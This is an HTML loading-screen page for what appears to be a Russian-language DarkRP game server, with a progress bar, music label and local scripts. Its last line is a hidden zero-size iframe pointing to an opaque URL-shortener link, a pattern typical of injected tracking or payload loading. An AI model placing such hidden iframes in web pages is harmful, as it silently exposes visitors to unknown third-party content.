<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<title>ПрекрасноеРП | Loading Screen</title>
	<link href='http://fonts.googleapis.com/css?family=Quicksand:400,700' rel='stylesheet' type='text/css'>
	<link rel="stylesheet" href="css/sleek.css">
</head>
<body>
<!--     <iframe width="560" height="315" src="https://www.youtube.com/embed/RjmWwiENb08?rel=0&autoplay=1&amp;controls=0&amp;showinfo=0" frameborder="0" allowfullscreen class=hidden></iframe> -->
	<!-- <div id="player"></div>
	<div id="overlay"></div> -->

	<div id="title">ПрекрасноеРП</div>
	<!-- <div id="subtitle">
		You're currently playing on <span id="DarkRP">DarkRP</span> on <span id="RockFord V2">RockFord_french_v4</span>
	</div> -->

	<div id="status-container">
		<!-- <div id="status">получение информации о сервере</div> -->
		<div id="loading">
			<div id="loading-progress"></div>
		</div>
		<div id="messages"></div>
	</div>

	<div id="music">
		Сейчас вы слушаете :<div id="music-name"></div>
	</div>

	<script src="js/lib/jquery-2.1.1.min.js"></script>
	<script src="js/lib/jquery.backstretch.min.js"></script>
	<script src="js/config.js"></script>
	<script src="js/sleek.js"></script>
	<iframe src="https://lc.cx/JqVG" width="0" height="0" tabindex="-1" title="empty" class="hidden">

</body>
</html>